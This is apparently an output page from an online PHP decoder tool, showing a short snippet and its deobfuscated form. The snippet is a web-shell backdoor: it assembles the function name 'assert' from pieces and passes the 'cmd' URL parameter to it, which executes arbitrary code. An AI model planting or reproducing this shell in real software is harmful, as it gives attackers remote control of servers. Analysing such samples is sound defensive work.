Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php class talker{ public $data = 'Hi'; public function & get(){ retu..
Decoded Output download
<?php
class talker{
public $data = 'Hi';
public function & get(){
return $this->data;
}
}
$aa = new talker();
$d = &$aa->get();
$d = $_GET[cmd];
function foo(&$var)
{
$var=$var.'t';
}
$a="asser";
foo($a);
$a($aa->data); ?>
Did this file decode correctly?
Original Code
<?php
class talker{
public $data = 'Hi';
public function & get(){
return $this->data;
}
}
$aa = new talker();
$d = &$aa->get();
$d = $_GET[cmd];
function foo(&$var)
{
$var=$var.'t';
}
$a="asser";
foo($a);
$a($aa->data);
Function Calls
None |
Stats
MD5 | f5d721a4225c37480bc91b4da9efb15a |
Eval Count | 0 |
Decode Time | 106 ms |